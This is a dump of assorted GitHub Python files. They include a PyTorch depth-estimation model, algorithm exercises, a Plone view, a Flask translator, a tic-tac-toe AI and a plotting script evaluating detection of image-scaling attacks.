self._attn(torch.cat([dropout_x[0], hidden[0]], dim=1)), dim=1\n )\n\n # bmm 是 batch mm, 即 batch 矩阵乘法.\n attn_hidden = torch.bmm(\n attn_weight.unsqueeze(0), e_hidden.unsqueeze(0)\n )\n\n cat_x = torch.cat([dropout_x[0], attn_hidden[0]], dim=1)\n combine_x = self._combine(cat_x).unsqueeze(0)\n\n relu_x = F.relu(combine_x)\n gru_x, gru_hidden = self._gru(relu_x, hidden)\n\n out_x = F.log_softmax(self._out(gru_x[0]), 
dim=1)\n return out_x, gru_hidden, attn_weight\n\n def init_hidden(self):\n return Variable(torch.zeros(1, 1, self._hidden_dim))\n","repo_name":"LeePleased/Seq2Seq-MachineTranslation","sub_path":"refer.py","file_name":"refer.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22742437374","text":"from typing import Union, Tuple, Optional, List\nimport math\n\nimport torch.nn as nn\nimport torch\nfrom timm.models.layers import to_2tuple, trunc_normal_\n\n\nclass OverlapPatchEmbed(nn.Module):\n \"\"\"\n DEST overlap patch embedding.\n diff with segformer:\n * BatchNorm instead of LayerNorm\n \"\"\"\n def __init__(self,\n in_channels: int,\n out_channels: int,\n patch_size: Union[int, Tuple[int, int]] = 7,\n stride: int = 4,\n ):\n super().__init__()\n patch_size = to_2tuple(patch_size)\n\n self.patch_size = patch_size\n self.out_channels = out_channels\n\n self.proj = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=patch_size, stride=stride,\n padding=(patch_size[0] // 2, patch_size[1] // 2), bias=False),\n nn.BatchNorm2d(out_channels)\n )\n self.flatten_spatial = nn.Flatten(start_dim=2)\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Conv2d):\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x):\n x = self.proj(x)\n _, _, H, W = x.size()\n x = self.flatten_spatial(x)\n return x, H, W\n\n\nclass SimplifiedAttention(nn.Module):\n def __init__(self,\n embed_dim: int,\n num_heads: int = 8,\n qk_scale: Optional[float] = None,\n sr_ratio: int = 1):\n super().__init__()\n assert embed_dim % num_heads == 0, f\"embed_dim {embed_dim} should be divided by num_heads {num_heads}.\"\n\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n head_dim = embed_dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n\n self.q = nn.Conv1d(embed_dim, embed_dim, kernel_size=1, bias=False)\n\n self.sr_ratio = sr_ratio\n if sr_ratio > 1:\n self.spatial_reduction = nn.Sequential(\n nn.Conv2d(embed_dim, embed_dim, kernel_size=sr_ratio, stride=sr_ratio,\n bias=False),\n nn.BatchNorm2d(embed_dim)\n )\n self.flatten_spatial = nn.Flatten(start_dim=2)\n\n self.k = nn.Conv1d(embed_dim, embed_dim, kernel_size=1, bias=False)\n\n # TODO - with BN??\n self.proj = nn.Sequential(\n nn.Conv1d(embed_dim, embed_dim, kernel_size=1, bias=False),\n nn.BatchNorm1d(embed_dim)\n )\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Conv2d):\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.Conv1d):\n fan_out = m.kernel_size[0] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x, H, W):\n B, C, N = x.shape\n\n q = self.q(x).reshape(B, self.num_heads, C // self.num_heads, N).permute(0, 1, 3, 2)\n\n if self.sr_ratio > 1:\n x_ = x.reshape(B, C, H, W)\n x_ = self.spatial_reduction(x_)\n x_ = self.flatten_spatial(x_)\n k = self.k(x_).reshape(B, self.num_heads, C // self.num_heads, -1).permute(0, 1, 2, 3)\n else:\n k = self.k(x).reshape(B, self.num_heads, C // self.num_heads, -1).permute(0, 1, 2, 3)\n\n attn = torch.matmul(q, k) * self.scale\n attn = attn.max(dim=-1, keepdims=False)[0]\n\n attn = attn.transpose(-1, -2)\n v = x.mean(dim=-1, keepdims=True).expand(B, C, self.num_heads).transpose(-1, -2)\n\n x = torch.matmul(attn, v).transpose(-1, -2)\n x = self.proj(x)\n return x\n\n\nclass MixFFN(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n 
expansion_ratio: float):\n super().__init__()\n hidden_channels = int(in_channels * expansion_ratio)\n self.fc1 = nn.Sequential(\n nn.Conv1d(in_channels, hidden_channels, kernel_size=1, bias=False),\n nn.BatchNorm1d(hidden_channels),\n )\n self.dw_conv = nn.Sequential(\n nn.Conv2d(hidden_channels, hidden_channels, kernel_size=3, padding=1, groups=hidden_channels, bias=False),\n nn.BatchNorm2d(hidden_channels),\n nn.ReLU()\n )\n self.fc2 = nn.Conv1d(hidden_channels, out_channels, kernel_size=1)\n self.apply(self._init_weights)\n\n def _init_weights(self, m):\n if isinstance(m, nn.Conv2d):\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.Conv1d):\n fan_out = m.kernel_size[0] * m.out_channels\n fan_out //= m.groups\n m.weight.data.normal_(0, math.sqrt(2.0 / fan_out))\n if m.bias is not None:\n m.bias.data.zero_()\n\n def forward(self, x, H, W):\n x = self.fc1(x)\n B, C, N = x.size()\n x = x.reshape(B, C, H, W)\n x = self.dw_conv(x)\n x = torch.flatten(x, 2)\n x = self.fc2(x)\n return x\n\n\nclass Block(nn.Module):\n def __init__(self,\n embed_dims: int,\n num_heads: int,\n mlp_ratio: float,\n sr_ratio: int = 1,\n qk_scale: Optional[float] = None):\n super().__init__()\n self.norm1 = nn.BatchNorm1d(embed_dims)\n self.attn = SimplifiedAttention(embed_dims, num_heads=num_heads, sr_ratio=sr_ratio, qk_scale=qk_scale)\n self.norm2 = nn.BatchNorm1d(embed_dims)\n self.mix_ffn = MixFFN(embed_dims, embed_dims, expansion_ratio=mlp_ratio)\n\n def forward(self, x, H, W):\n x = x + self.attn(self.norm1(x), H, W)\n x = x + self.mix_ffn(self.norm2(x), H, W)\n return x\n\n\nclass EncoderStage(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n patch_size: int,\n stride: int,\n num_blocks: int,\n num_heads: int,\n mlp_ratio: float,\n sr_ratio: int):\n super().__init__()\n self.path_embed = OverlapPatchEmbed(in_channels, out_channels, patch_size=patch_size, stride=stride)\n\n self.blocks = nn.ModuleList([\n Block(\n embed_dims=out_channels, num_heads=num_heads, mlp_ratio=mlp_ratio, sr_ratio=sr_ratio\n ) for _ in range(num_blocks)\n ])\n\n def forward(self, x):\n x, H, W = self.path_embed(x)\n for block in self.blocks:\n x = block(x, H, W)\n return x, H, W\n\n\nclass Encoder(nn.Module):\n def __init__(self,\n in_channels: int,\n width_list: List[int],\n patch_sizes: List[int],\n strides_list: List[int],\n num_blocks: List[int],\n num_heads: List[int],\n mlp_ratios: List[float],\n sr_ratios: List[int],\n is_out_feature_list: List[bool]):\n super().__init__()\n self.is_out_feature_list = is_out_feature_list\n self.width_list = width_list\n\n num_stages = len(width_list)\n self.stages = nn.ModuleList()\n\n for i in range(num_stages):\n self.stages.append(\n EncoderStage(\n in_channels, out_channels=width_list[i], patch_size=patch_sizes[i], stride=strides_list[i],\n num_blocks=num_blocks[i], num_heads=num_heads[i], mlp_ratio=mlp_ratios[i], sr_ratio=sr_ratios[i]\n ))\n in_channels = width_list[i]\n\n def encoder_out_channels(self) -> List[int]:\n \"\"\"\n :return: num channels list of out feature maps.\n \"\"\"\n return [ch for ch, is_out in zip(self.width_list, self.is_out_feature_list) if is_out]\n\n def forward(self, x) -> List[torch.Tensor]:\n B = x.size(0)\n out_list = []\n for i, stage in enumerate(self.stages):\n x, H, W = stage(x)\n x = x.reshape(B, -1, H, W)\n if self.is_out_feature_list[i]:\n out_list.append(x)\n return 
out_list\n\n\nclass UpFPNBlock(nn.Module):\n \"\"\"\n Fuse features from the encoder. Upsample is done by bilinear upsample.\n \"\"\"\n\n def __init__(self, in_channels: int, skip_channels: int):\n super().__init__()\n self.up_path = nn.Sequential(\n nn.Conv2d(in_channels, skip_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(skip_channels),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode=\"bilinear\")\n )\n\n self.skip_path = nn.Sequential(\n nn.Conv2d(skip_channels, skip_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(skip_channels),\n )\n\n def forward(self, x, skip):\n x = self.up_path(x)\n skip = self.skip_path(skip)\n return x + skip\n\n\nclass DecoderFPN(nn.Module):\n def __init__(\n self,\n skip_channels_list: List[int],\n ):\n \"\"\"\n \"\"\"\n super().__init__()\n self.up_channels_list = skip_channels_list\n # Reverse order to up-bottom order, i.e [stage4_ch, stage3_ch, ... , stage1_ch]\n self.up_channels_list.reverse()\n # Remove last stage num_channels, as it is the input to the decoder.\n in_channels = self.up_channels_list.pop(0)\n\n self.up_stages = nn.ModuleList()\n for out_channels in self.up_channels_list:\n self.up_stages.append(UpFPNBlock(in_channels, out_channels))\n in_channels = out_channels\n\n def forward(self, feats: List[torch.Tensor]):\n # Reverse order to up-bottom order, i.e [stage4_ch, stage3_ch, ... , stage1_ch]\n feats.reverse()\n # Remove last stage feature map, as it is the input to the decoder and not a skip connection.\n x = feats.pop(0)\n for up_stage, skip in zip(self.up_stages, feats):\n x = up_stage(x, skip)\n return x\n\n\nclass SegHead(nn.Module):\n def __init__(self, in_channels: int, num_classes: int):\n super().__init__()\n self.head = nn.Sequential(\n nn.Upsample(scale_factor=2, mode=\"bilinear\"),\n nn.Conv2d(in_channels, in_channels, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels, num_classes, kernel_size=1, bias=True)\n )\n\n def forward(self, x):\n return self.head(x)\n\n\nclass DepthHead(nn.Module):\n def __init__(self, in_channels: int, num_classes: int):\n super().__init__()\n self.head = nn.Sequential(\n nn.Upsample(scale_factor=2, mode=\"bilinear\"),\n nn.Conv2d(in_channels, in_channels, kernel_size=1, bias=True),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Upsample(scale_factor=2, mode=\"bilinear\"),\n nn.Conv2d(in_channels, in_channels, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(),\n nn.Conv2d(in_channels, num_classes, kernel_size=1, bias=True)\n )\n\n def forward(self, x):\n return self.head(x)\n\n\nclass DepthNet(nn.Module):\n def __init__(self,\n num_classes: int,\n head_type: str,\n in_channels: int,\n width_list: List[int],\n patch_sizes: List[int],\n strides_list: List[int],\n num_blocks: List[int],\n num_heads: List[int],\n mlp_ratios: List[float],\n sr_ratios: List[int],\n is_out_feature_list: List[bool]):\n super().__init__()\n self.encoder = Encoder(in_channels, width_list=width_list, patch_sizes=patch_sizes, strides_list=strides_list,\n num_blocks=num_blocks, num_heads=num_heads, mlp_ratios=mlp_ratios, sr_ratios=sr_ratios,\n is_out_feature_list=is_out_feature_list)\n self.decoder = DecoderFPN(skip_channels_list=self.encoder.encoder_out_channels())\n self.head = self.build_head(head_type=head_type, in_channels=self.encoder.encoder_out_channels()[0],\n num_classes=num_classes)\n\n def build_head(self, head_type: str, in_channels: int, num_classes: int):\n if head_type == \"depth\":\n return 
DepthHead(in_channels, num_classes)\n if head_type == \"segmentation\":\n return SegHead(in_channels, num_classes)\n raise ValueError(f\"head_type: {head_type} is not supported.\")\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n return self.head(x)\n\n\nclass DEST_B0(DepthNet):\n def __init__(self, in_channels: int = 3, num_classes: int = 1, head_type: str = \"depth\"):\n super().__init__(in_channels=in_channels,\n num_classes=num_classes,\n head_type=head_type,\n width_list=[32, 64, 128, 256],\n patch_sizes=[7, 3, 3, 3],\n strides_list=[4, 2, 2, 2],\n num_blocks=[2, 2, 2, 2],\n num_heads=[1, 2, 4, 8],\n mlp_ratios=[4, 4, 4, 4],\n sr_ratios=[8, 4, 2, 1],\n is_out_feature_list=[True, True, True, True])\n\n\nclass B0Encoder(Encoder):\n def __init__(self, in_channels: int = 3, num_classes: int = 1, head_type: str = \"depth\"):\n super().__init__(in_channels=in_channels,\n width_list=[32, 64, 128, 256],\n patch_sizes=[7, 3, 3, 3],\n strides_list=[4, 2, 2, 2],\n num_blocks=[2, 2, 2, 2],\n num_heads=[1, 2, 4, 8],\n mlp_ratios=[4, 4, 4, 4],\n sr_ratios=[8, 4, 2, 1],\n is_out_feature_list=[True, True, True, True])\n\nif __name__ == '__main__':\n from utils.conversion_utils import onnx_simplify\n\n # m = OverlapPatchEmbed(embed_dim=64, patch_size=7, stride=4, in_channels=3)\n # path = \"../checkpoints/overlap_path_embed.onnx\"\n # x = torch.randn(1, 3, 512, 1024)\n\n # m = SimplifiedAttention(embed_dim=64, num_heads=2, spatial_reduction_ratio=4)\n # path = \"../checkpoints/simplified_attention.onnx\"\n # x = torch.randn(1, 64, 64 * 128)\n # x = (x, 128, 256)\n\n # m = MixFFN(64, 64, expansion_ratio=4)\n # path = \"../checkpoints/mixffn.onnx\"\n # x = torch.randn(1, 64, 64 * 128)\n # x = (x, 64, 128)\n\n # m = Block(64, 4, mlp_ratio=4, sr_ratio=4)\n # path = \"../checkpoints/transformer_block.onnx\"\n # x = torch.randn(1, 64, 64 * 128)\n # x = (x, 64, 128)\n\n # m = EncoderStage(32, 64, patch_size=3, stride=2, num_blocks=2, num_heads=4, mlp_ratio=4, sr_ratio=4)\n # path = \"../checkpoints/transformer_stage.onnx\"\n # x = torch.randn(1, 32, 64, 128)\n\n # m = B0Encoder()\n # path = \"../checkpoints/b0_encoder.onnx\"\n # x = torch.randn(1, 3, 32, 64)\n\n # m = DecoderFPN([32, 64, 128])\n # path = \"../checkpoints/decoder_fpn.onnx\"\n # x = [\n # torch.randn(1, 32, 32, 32),\n # torch.randn(1, 64, 16, 16),\n # torch.randn(1, 128, 8, 8),\n # ]\n\n m = DEST_B0()\n path = \"../checkpoints/dest-b0.onnx\"\n x = torch.randn(1, 3, 512, 1024)\n\n # path = \"../checkpoints/tmp.onnx\"\n\n torch.onnx.export(m, x, path, opset_version=13)\n onnx_simplify(path, path)\n","repo_name":"lkdci/DEST_unofficial","sub_path":"models/dest.py","file_name":"dest.py","file_ext":"py","file_size_in_byte":16122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13340021068","text":"'''@Ericódigos - 11/06/2019 \nFundamentos são importantes. Uma prova disse é um algorítimo \nescrito a mais de 2300 anos por Euclides e que ainda hoje é \nabsolutamente útil e elegantemente econômico em termos de \nprocessamento.\n\nImagine um problema que exija uma função que retorne o \nMínimo Múltiplo Comum de um intervalo de inteiros.\n\n'''\n\nimport functools\nfrom datetime import datetime\n\ntime1 = datetime.now()\nlista = []\n\ndef mmc_Rank_C(lst):\n \"\"\" Retorna MMC de um intervalo de inteiros. \"\"\"\n itera = 0 # Contador de interações\n lst.sort() # Classifica a lista\n \n ''' Cria a lista com o intervalo entre o menor e o maior número. '''\n lista = list(range(lst[0],lst[-1]+1))\n \n ''' Retorna o fatorial do intervalo'''\n pior = functools.reduce(lambda a,b: a*b,lista)\n\n for e in range(0,pior,lista[-1]):\n itera += 1\n if all(e % i == 0 and e != 0 for i in lista):\n print('Iterações: ',itera)\n print('Resultado do MMC de ', lista) \n return e\n \n\nprint('-->',mmc_Rank_C([23,15]))\ntime2 = datetime.now()\nprint('A função demorou: ',(time2-time1))\n\n\n\n###########################\n\n\n\ntime1 = datetime.now()\n\ndef mmc_Rank_B(lista):\n lista.sort(reverse=True)\n novaLista = list(range(lista[0],lista[-1]-1,-1))\n quociente = 0\n loop = 1\n n = 0\n while(n != len(novaLista)):\n quociente = novaLista[0] * loop * novaLista[1]\n if all(quociente % e == 0 for e in novaLista):\n break\n loop+=1\n print('Iterações: ',loop) \n return quociente\n \nprint(mmcIntervaloOkay([23,15]))\ntime2 = datetime.now()\nprint('A função demorou: ',(time2-time1))\n\n\n###################################\n\n\ntime1 = datetime.now()\nitera = 0\ndef mmcIntervalo_Rank_S(lst):\n global itera\n mínimo = min(lst)\n máximo = max(lst)\n v_mmc = mmc(mínimo, mínimo+1)\n lista = list(range(mínimo,máximo))\n while(mínimo < máximo):\n mínimo += 1\n v_mmc = mmc(v_mmc,mínimo)\n print('Iterações: ',itera)\n print('O MMC de: ',lista)\n return v_mmc \n\ndef mdc(a,b):\n global itera\n while(b != 0):\n itera += 1\n t = a\n a = b\n b = t % b\n return a\n\ndef mmc(a,b):\n return int((a * b /mdc(a,b)))\n\nprint(mmcIntervalo_Rank_S([23,15]))\ntime2 = datetime.now()\nprint('A função demorou: ',(time2-time1))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n''' math.gcd(a, b) '''\n","repo_name":"ericodex/JS-ES6","sub_path":"MMC Euclides.py","file_name":"MMC Euclides.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"1618179294","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom zope.component import ComponentLookupError, getUtility\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.Five import BrowserView\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom plone.registry.interfaces import IRegistry\n\nfrom collective.complexrecordsproxy import ComplexRecordsProxy\nfrom collective.autopublishing.browser.autopublishsettings import (\n IAutopublishSettingsSchema,\n)\nfrom collective.autopublishing.eventhandler import handle_publishing, handle_retracting\n\nlogger = logging.getLogger(\"collective.autopublishing\")\n\n\nclass AutopublishReport(BrowserView):\n @property\n def portal(self):\n return getToolByName(self.context, \"portal_url\").getPortalObject()\n\n __call__ = ViewPageTemplateFile(\"autopublish_report.pt\")\n\n @property\n def report(self):\n catalog = getToolByName(self.context, \"portal_catalog\")\n\n try:\n settings = getUtility(IRegistry).forInterface(\n IAutopublishSettingsSchema,\n omit=(\"publish_actions\", \"retract_actions\"),\n factory=ComplexRecordsProxy,\n )\n except (ComponentLookupError, KeyError):\n logger.info(\n \"The product needs to be installed. No settings in the\" \" registry.\"\n )\n return\n\n if \"enableAutopublishing\" not in catalog.indexes():\n logger.info(\"Catalog does not have a enableAutopublishing index\")\n return\n\n p_result = handle_publishing(self.context, settings, dry_run=True, log=False)\n r_result = handle_retracting(self.context, settings, dry_run=True, log=False)\n\n result = {}\n result[\"p_result\"] = p_result\n result[\"r_result\"] = r_result\n return result\n","repo_name":"collective/collective.autopublishing","sub_path":"collective/autopublishing/browser/autopublishreport.py","file_name":"autopublishreport.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"10429997964","text":"# Zadanie 1. (pokrycie przedziałami jednostkowymi) Dany jest zbiór punktów X = {x1,...,xn} na prostej.\n# Proszę podać algorytm, który znajduje minimalną liczbę przedziałów jednostkowych domkniętych,\n# potrzebnych do pokrycia wszystkich punktów z X. (Przykład: Jeśli X = {0.25, 0.5, 1.6} to potrzeba\n# dwóch przedziałów, np. [0.2,1.2] oraz [1.4,2.4]).\n\n# ROZW: Sortuje punkty niemalejąco, następnie nowy przedział zaczynam od pierwszego niepokrytego.\n\ndef CoverIntervals(points):\n n = len(points)\n points.sort()\n cnt = 0\n curr = points[0] + 1 # aktualny koniec\n for i in range(n):\n if points[i] > curr: # nowy początek\n cnt += 1\n curr = points[i] + 1 # nowy koniec\n\n return curr\n\n\ntest = [0.25, 0.5, 1.6]\nprint(CoverIntervals(test))","repo_name":"YoC00lig/Algorithms-and-data-structures","sub_path":"Labs/lab7/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8459599921","text":"from flask import Flask, render_template, request\r\nfrom translatorE2F import english_to_french, french_to_english\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route('/translate/english_to_french', methods=['POST'])\r\ndef translate_english_to_french():\r\n if request.method == 'POST':\r\n text = request.form['text']\r\n translated_text = english_to_french(text)\r\n return render_template('result.html', text=text, translated_text=translated_text)\r\n else:\r\n return 'Method Not Allowed', 405\r\n\r\n@app.route('/translate/french_to_english', methods=['POST'])\r\ndef translate_french_to_english():\r\n if request.method == 'POST':\r\n text = request.form['text']\r\n translated_text = french_to_english(text)\r\n return render_template('result.html', text=text, translated_text=translated_text)\r\n else:\r\n return 'Method Not Allowed', 405\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","repo_name":"shivamehta/translateE2F","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74388029981","text":"import sys\nfrom collections import deque\n\n## 입력 및 그래프 생성\nN, M, V = map(int, sys.stdin.readline().split())\n\ngraph = [[] for _ in range(N + 1)]\nfor _ in range(M):\n a, b = map(int, sys.stdin.readline().split())\n \n graph[a].append(b)\n graph[b].append(a)\n\nfor i in range(0, len(graph)):\n graph[i].sort()\n\n## dfs 정의\ndef search_dfs(v):\n visited[v] = True\n print(v, end=\" \")\n \n for i in graph[v]:\n if not visited[i]:\n search_dfs(i)\n\n## bfs 정의\ndef search_bfs(start):\n visited[start] = True\n que = deque()\n que.append(start)\n\n while que:\n v = que.popleft()\n print(v, end=\" \")\n\n for i in graph[v]:\n if not visited[i]:\n que.append(i)\n visited[i] = True\n\n\nvisited = [False] * (N + 1)\nsearch_dfs(V)\n\nprint()\n\nvisited = [False] * (N + 1)\nsearch_bfs(V)","repo_name":"younhwan97/algorithm-practice","sub_path":"python/Search/백준-DFS와BFS.py","file_name":"백준-DFS와BFS.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"24974163466","text":"import random\r\nfrom btree import LinkedBinaryTree as Tree\r\n\r\n\r\nclass Board:\r\n \"\"\"Class for Board representation\"\"\"\r\n def __init__(self, board, last_turn=None):\r\n \"\"\"Create new Board\"\"\"\r\n self.board = board # string\r\n self.opponent = self.board[last_turn] if last_turn is not None else 'O'\r\n self.player = 'O' if self.opponent == 'X' else 'X'\r\n self.tree = Tree()\r\n\r\n def check_win(self, board=None):\r\n \"\"\"Checks if there is a winning combination on board\"\"\"\r\n if board is None:\r\n board = self.board\r\n if not self.player:\r\n return False\r\n for x in range(0, 3):\r\n row = {board[x * 3:][0], board[x * 3:][1], board[x * 3:][2]}\r\n column = {board[x], board[x + 3], board[x + 6]}\r\n if len(column) == 1:\r\n return board[x]\r\n if len(row) == 1:\r\n return board[x * 3:][0]\r\n\r\n diag1 = {board[0], board[4], board[8]} # diagonals\r\n diag2 = {board[2], board[4], board[6]}\r\n if len(diag1) == 1 or len(diag2) == 1:\r\n return board[4]\r\n if board.count(self.player) + board.count(self.opponent) == 9:\r\n return None # Draw\r\n return False\r\n\r\n def make_tree(self):\r\n \"\"\"Construct a decision tree\"\"\"\r\n def add(position, curr_player, leaves=[]):\r\n board = position.element()\r\n winner = self.check_win(board)\r\n if winner:\r\n self.tree.mark(position, 'win' + winner)\r\n leaves.append(position)\r\n return\r\n poss_moves = [int(i) - 1 for i in board if i != 'O' and i != 'X']\r\n if not poss_moves:\r\n self.tree.mark(position, 'draw')\r\n leaves.append(position)\r\n return\r\n\r\n moves = 2 if len(poss_moves) > 1 else 1\r\n for i in range(moves):\r\n move = random.choice(poss_moves)\r\n poss_moves.remove(move)\r\n p = self.tree.add(board[:move] + curr_player\r\n + board[move + 1:], p=position)\r\n add(p, 'X' if curr_player == 'O' else 'O', leaves)\r\n return leaves\r\n\r\n root = self.tree.add(self.board)\r\n leaves = add(root, self.player)\r\n return leaves\r\n\r\n def choose_move(self):\r\n \"\"\"Choose the best move for computer\"\"\"\r\n leaves = self.make_tree()\r\n root = self.tree.root()\r\n right, left = self.tree.right(root), self.tree.left(root)\r\n parents = {x.element(): 0 for x in [left, right] if x is not None}\r\n for leaf in leaves:\r\n parent = self.tree.find_parent(leaf).element()\r\n if leaf.mark() == 'win' + self.player:\r\n if parent == leaf.element():\r\n for i in range(9):\r\n if leaf.element()[i] != parent[i]:\r\n return i\r\n parents[parent] += 1\r\n elif leaf.mark() == 'win' + self.opponent:\r\n parents[parent] -= 1\r\n\r\n mean = sum(parents.values()) / len(parents) # check if all chances are\r\n if not all(parents[z] == mean for z in parents.keys()): # not equal\r\n next_board = max(parents, key=lambda x: parents[x])\r\n else:\r\n next_board = random.choice(list(parents.keys()))\r\n for i in range(9):\r\n if self.board[i] != next_board[i]:\r\n return i\r\n\r\n def draw(self):\r\n \"\"\"Print the game board\"\"\"\r\n print('\\n 1 2 3')\r\n for i in range(3):\r\n print(' ' + str(i + 1), end=' ')\r\n for j in range(3):\r\n cell = self.board[i * 3:][j]\r\n print(cell if cell == 'O' or cell == 'X' else ' ', end=' ')\r\n print()\r\n","repo_name":"lazyTurtle21/TicTacToe","sub_path":"task3/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35398438092","text":"import pickle\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as F\nfrom PIL import Image\nfrom tqdm import trange\n\nfrom depreciated.scaleadv import get_imagenet\nfrom depreciated.scaleadv import Align\nfrom depreciated.scaleadv import POOLING_MAPS\nfrom depreciated.scaleadv import Unscaling\nfrom depreciated.scaleadv import ScalingLayer\nfrom depreciated.scaleadv import ScalingAPI\nfrom depreciated.scaleadv.utils import set_ccs_font\n\n\"\"\"\npython -m scripts.plot_detection_blackbox [none|median] [ratio] [max queries]\n\"\"\"\n# Params\nDEFENSE, RATIO, QUERIES = sys.argv[1:]\nRATIO, QUERIES = map(int, [RATIO, QUERIES])\n\n# Load data\ntransform = T.Compose([Align(224, RATIO), T.ToTensor(), lambda x: np.array(x)[None, ...]])\ndataset = get_imagenet(f'val_{RATIO}', transform)\nid_list = pickle.load(open(f'static/meta/valid_ids.model_none.scale_{RATIO}.pkl', 'rb'))[::4]\n\n# Load scaling\nsrc_size, inp_size = (224 * RATIO, 224 * RATIO), (224, 224)\nscale_down = ScalingAPI(src_size, inp_size, 'cv', 'linear')\nscale_up = ScalingAPI(inp_size, src_size, 'cv', 'linear')\n\n# Load networks\nscaling_layer = ScalingLayer.from_api(scale_down).cuda()\npooling_layer = POOLING_MAPS[DEFENSE].auto(RATIO * 2 - 1, scale_down.mask).cuda()\n\n\ndef plot(det):\n # Run attack\n score_src, score_att = [], []\n bb = 'bb_med37' if DEFENSE == 'median' else 'bb'\n with trange(100) as pb:\n for i in pb:\n # find number of iterations\n try:\n data = pickle.load(open(f'static/{bb}/{i}.ratio_{RATIO}.def_{DEFENSE}.log', 'rb'))\n except FileNotFoundError:\n continue\n for it, query, _ in data:\n if query >= QUERIES:\n break\n\n # load images\n src, _ = dataset[id_list[i]]\n att = F.to_tensor(Image.open(f'static/{bb}/{i}.ratio_{RATIO}.def_{DEFENSE}.{it:02d}.png')).numpy()\n\n # compute scores\n score_src.append(det.score(src))\n score_att.append(det.score(att[None]))\n print(len(score_src))\n\n # Eval\n fig, axes = plt.subplots(ncols=2, figsize=(4, 2), constrained_layout=True)\n for i, name in enumerate(['MSE', 'SSIM']):\n ss, sa = [list(zip(*arr))[i] for arr in [score_src, score_att]]\n sns.distplot(ss, kde=False, label='Benign', ax=axes[i])\n sns.distplot(sa, kde=False, label='Attack', ax=axes[i])\n axes[i].set_xlabel(name)\n if name == 'SSIM':\n axes[i].set_xlim(-0.05, 1.05)\n axes[i].legend(frameon=False, borderaxespad=0, loc=i + 1)\n\n fig.suptitle(f'{det.name.title()} Defense ({QUERIES // 1000}K Queries)')\n fig.savefig(f'det-bb-{DEFENSE}-{det.name}.{QUERIES}.{RATIO}.pdf')\n\n from IPython import embed; embed(using=False); exit()\n\n\n# Get detection\ndet = [\n Unscaling(scale_down, scale_up, pooling_layer),\n # MinimumFilter(),\n]\nset_ccs_font(12)\nfor d in det:\n plot(d)\n","repo_name":"AHK-11/rethinking-image-scaling-attacks","sub_path":"depreciated/scripts/plot_detection_blackbox.py","file_name":"plot_detection_blackbox.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
